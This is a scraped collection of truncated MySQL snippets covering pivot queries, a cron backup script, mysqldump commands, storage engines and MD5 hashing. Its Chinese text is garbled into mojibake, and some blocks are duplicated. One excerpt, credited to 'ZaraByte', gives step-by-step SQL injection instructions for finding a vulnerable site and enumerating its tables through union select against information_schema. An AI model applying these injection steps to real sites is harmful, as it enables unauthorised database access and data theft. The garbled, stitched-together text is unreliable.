CREATE TABLE `taa` (
`year` varchar(4) DEFAULT NULL,
`month` varchar(2) DEFAULT NULL,
`amount` double DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf
"year","month",amount
"1991","1",1.1
"1991","2",1.2
"1991","3",1.3
"1991","4",1.4
"1992","1",2.1
"1992","2",2.2
"1992","3",2.3
"1992","4",2.4
1.select a.year,a.m1,a.m2,b.m3,b.m4 from
(select year,
sum(if(month=1,amount,0)) as m1,
sum(if(MONTH=2,amount,0)) AS m2
from taa
group by year) a,
(SELECT year,
SUM(IF(MONTH=3,amount,0)) AS m3,
SUM(IF(MONTH=4,amount,0)) AS m4
from taa
GROUP BY YEAR) b
where a.year=b.year;
2.select year,
max((case month when 1 then amount end)) as m1,
max((CASE MONTH WHEN 2 THEN amount END)) AS m2,
max((CASE MONTH WHEN 3 THEN amount END)) AS m3,
max((CASE MONTH WHEN 4 THEN amount END)) AS m4
from taa
group by year; ......
¿ÉÒÔ½«Õâ¸ö½Å±¾·Å½øcrontab£¬ËûµÄÅäÖÆÎļþÔÚ /etc/crontabÖÐÿÌìÁ賿ִÐÐÒ»´Î£¬×Ô¶¯±¸·Ý Õâ¸ö½Å±¾Ã¿Ìì×î¶àÖ»Ö´ÐÐÒ»´Î£¬¶øÇÒÖ»±£Áô×î½üÎåÌìµÄ±¸·ÝÔÚ·þÎñÆ÷ÉÏ¡£
#!/bin/bash
#This is a ShellScript For Auto DB Backup
#Powered by aspbiz
#2004-09
#Setting
#ÉèÖÃÊý¾Ý¿âÃû£¬Êý¾Ý¿âµÇ¼Ãû£¬ÃÜÂ룬±¸·Ý·¾¶£¬ÈÕ־·¾¶£¬Êý¾ÝÎļþλÖã¬
#ÒÔ¼°±¸·Ý·½Ê½
#ĬÈÏÇé¿öϱ¸·Ý·½Ê½ÊÇtar£¬»¹¿ÉÒÔÊÇmysqldump,mysqldotcopy
#ĬÈÏÇé¿öÏ£¬ÓÃroot(¿Õ)µÇ¼mysqlÊý¾Ý¿â£¬±¸·ÝÖÁ/root/namexxxxx.tgz
DBName=mysql
DBUser=root
DBPasswd=password
BackupPath=/root/
LogFile=/root/db.log
DBPath=/var/local/mysql5/var/
#BackupMethod=mysqldump
#BackupMethod=mysqlhotcopy
#BackupMethod=tar
#Setting End
NewFile="$BackupPath""$DBName"$(date +%y%m%d).tgz
DumpFile="$BackupPath""$DBName"$(date +%y%m%d)
OldFile="$BackupPath""$DBName"$(date +%y%m%d --date='5 days ago').tgz
echo "-------------------------------------------" >> $LogFile
echo $(date +"%y-%m-%d %H:%M:%S") >> $LogFile
echo "------------------ ......
¿ÉÒÔ½«Õâ¸ö½Å±¾·Å½øcrontab£¬ËûµÄÅäÖÆÎļþÔÚ /etc/crontabÖÐÿÌìÁ賿ִÐÐÒ»´Î£¬×Ô¶¯±¸·Ý Õâ¸ö½Å±¾Ã¿Ìì×î¶àÖ»Ö´ÐÐÒ»´Î£¬¶øÇÒÖ»±£Áô×î½üÎåÌìµÄ±¸·ÝÔÚ·þÎñÆ÷ÉÏ¡£
#!/bin/bash
#This is a ShellScript For Auto DB Backup
#Powered by aspbiz
#2004-09
#Setting
#ÉèÖÃÊý¾Ý¿âÃû£¬Êý¾Ý¿âµÇ¼Ãû£¬ÃÜÂ룬±¸·Ý·¾¶£¬ÈÕ־·¾¶£¬Êý¾ÝÎļþλÖã¬
#ÒÔ¼°±¸·Ý·½Ê½
#ĬÈÏÇé¿öϱ¸·Ý·½Ê½ÊÇtar£¬»¹¿ÉÒÔÊÇmysqldump,mysqldotcopy
#ĬÈÏÇé¿öÏ£¬ÓÃroot(¿Õ)µÇ¼mysqlÊý¾Ý¿â£¬±¸·ÝÖÁ/root/namexxxxx.tgz
DBName=mysql
DBUser=root
DBPasswd=password
BackupPath=/root/
LogFile=/root/db.log
DBPath=/var/local/mysql5/var/
#BackupMethod=mysqldump
#BackupMethod=mysqlhotcopy
#BackupMethod=tar
#Setting End
NewFile="$BackupPath""$DBName"$(date +%y%m%d).tgz
DumpFile="$BackupPath""$DBName"$(date +%y%m%d)
OldFile="$BackupPath""$DBName"$(date +%y%m%d --date='5 days ago').tgz
echo "-------------------------------------------" >> $LogFile
echo $(date +"%y-%m-%d %H:%M:%S") >> $LogFile
echo "------------------ ......
mysqlÉèÖÃÃÜÂëºÍÐÞ¸ÄÃÜÂ룺
/usr/local/mysql/bin/mysqladmin -uroot password 123456 µÚÒ»´ÎÉèÃÜÂë¡£
mysqladmin -uroot -p password mypasswd ÐÞ¸ÄÃÜÂë
ÊäÈëÕâ¸öÃüÁîºó£¬ÐèÒªÊäÈërootµÄÔÃÜÂ룬ȻºórootµÄÃÜÂ뽫¸ÄΪmypasswd¡£
¾ÍÊÇmysql5µ¼³öµÄÓÐdefault-charactµÄÉèÖã¬mysql4²»Ö§³Ö£¬ÐèÒª¼Óskip-opt²ÎÊý£¬È磺
mysqldump -uroot -p --default-character-set=gbk -skip-opt databse > hx.sql
Ò»°ãµÄÊý¾Ýµ¼³öÓÃ
mysqldump -uroot -pÃÜÂë database > database.sql //µ¼³öÊý¾Ý¡£
mysqldump -uroot -pÃÜÂë --opt Êý¾ÝÃû ±íÃû > /home/2009_5_29.sql //±¸·ÝÊý¾ÝÖеıí
mysqldump -uroot -pÃÜÂë --databases Êý¾ÝÃû1 Êý¾ÝÃû2 > /home/2009_5_29.sql //±¸·Ý¶¼¸öÊý¾Ý¿â
mysql -u root -p book <book.sql »òÖ±½Ó source book.sql //ÆäÖÐbookΪÊý¾Ý¿â
drop database Êý¾ÝÃû; //ɾ³ýÊý¾Ý
drop table ±íÃû; //ɾ³ý±í
ÏÂÃæ¶ÔһЩûÓõÄÓû§É¾³ý£¬
ÏȲ鿴 mysql ĬÈÏÓÐÄÇЩÓû§¡£
mysql µÄÓû§£¬»¹ÓÐһЩÐÅÏ¢ ÊÇ·ÅÔÚ mysql Êý¾Ý¿âµÄ¡£
mysql> use mysql;
Database changed
mysql> show tables;
¿ÉÒÔ¿´µ½ ÀïÃæµÄ±í¡£¡£¡£ÆäÖ ......
by ZaraByte
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
Thi ......
Èç¹ûÄãÊǸöÈü³µÊÖ²¢ÇÒ°´Ò»Ï°´Å¥¾ÍÄܹ»Á¢¼´¸ü»»ÒýÇæ¶ø²»ÐèÒª°Ñ³µ¿ªµ½³µ¿âÀïÈ¥»»£¬ÄÇ»áÊÇÔõô¸Ð¾õÄØ£¿MySQLÊý¾Ý¿âΪ¿ª·¢ÈËÔ±Ëù×öµÄ¾ÍºÃÏñÊǰ´°´Å¥»»ÒýÇæ£»ËüÈÃÄãÑ¡ÔñÊý¾Ý¿âÒýÇæ£¬²¢¸øÄãÒ»Ìõ¼òµ¥µÄ;¾¶À´Çл»Ëü¡£
MySQL µÄ×Ô´øÒýÇæ¿Ï¶¨Êǹ»ÓÃÁË£¬µ«ÊÇÔÚÓÐЩÇé¿öÏ£¬ÆäËûµÄÒýÇæ¿ÉÄÜÒª±ÈÊÖÍ·ËùÓøüÊʺÏÍê³ÉÈÎÎñ¡£Èç¹ûÔ¸ÒâµÄ»°£¬ÄãÉõÖÁ¿ÉÒÔʹÓÃMySQL++ APIÀ´´´½¨×Ô¼ºµÄÊý¾Ý¿âÒýÇæ£¬¾ÍÏñ´ò´©Æø¸××°ÉÏ×Ô¼ºµÄ»¯ÓÍÆ÷¡£ÏÖÔÚÈÃÎÒÃÇÀ´¿´¿´Äã¸ÃÈçºÎÑ¡ÔñÒýÇæ£¬ÒÔ¼°ÈçºÎÔÚ¿ÉÓÃÒýÇæÖ®¼äÇл»¡£
Ñ¡ÔñÄãµÄÒýÇæ
ÄãÄÜÓõÄÊý¾Ý¿âÒýÇæÈ¡¾öÓÚMySQLÔÚ°²×°µÄʱºòÊÇÈçºÎ±»±àÒëµÄ¡£ÒªÌí¼ÓÒ»¸öеÄÒýÇæ£¬¾Í±ØÐëÖØÐ±àÒëMySQL¡£½ö½öΪÁËÌí¼ÓÒ»¸öÌØÐÔ¶ø±àÒëÓ¦ÓóÌÐòµÄ¸ÅÄî¶ÔÓÚWindowsµÄ¿ª·¢ÈËÔ±À´Ëµ¿ÉÄÜºÜÆæ¹Ö£¬µ«ÊÇÔÚUNIXÊÀ½çÀÕâÒѾ³ÉΪÁ˱ê×¼¡£ÔÚȱʡÇé¿öÏ£¬MySQLÖ§³ÖÈý¸öÒýÇæ£ºISAM¡¢ MyISAMºÍHEAP¡£ÁíÍâÁ½ÖÖÀàÐÍInnoDBºÍBerkley£¨BDB£©£¬Ò²³£³£¿ÉÒÔʹÓá£
ISAM
ISAM ÊÇÒ»¸ö¶¨ÒåÃ÷È·ÇÒÀú¾Ê±¼ä¿¼ÑéµÄÊý¾Ý±í¸ñ¹ÜÀí·½·¨£¬ËüÔÚÉè¼ÆÖ®Ê±¾Í¿¼Âǵ½Êý¾Ý¿â±»²éѯµÄ´ÎÊýÒªÔ¶´óÓÚ¸üеĴÎÊý¡£Òò´Ë£¬ISAMÖ´ÐжÁÈ¡²Ù×÷µÄËٶȺܿ죬¶øÇÒ²»Õ¼ÓôóÁ¿µÄÄÚ´æºÍ´æ´¢×ÊÔ´¡£ISAMµÄÁ½¸öÖ÷Òª²»×ãÖ®´¦ÔÚÓÚ£¬Ëü²»Ö§ ......
MSSQL:select Right(sys.fn_VarBinToHexStr(hashbytes('MD5', '123456')),32)
MSSQL16λ:select Right(sys.fn_VarBinToHexStr(hashbytes('MD5', '123456')),16)
MySQL:select md5('123456')
.NET:string ½á¹û×Ö·û´®=System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(ÊäÈë×Ö·û´®,"MD5");
.NET16λ:System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(str,"MD5").ToLower().Substring(8,16) ; ......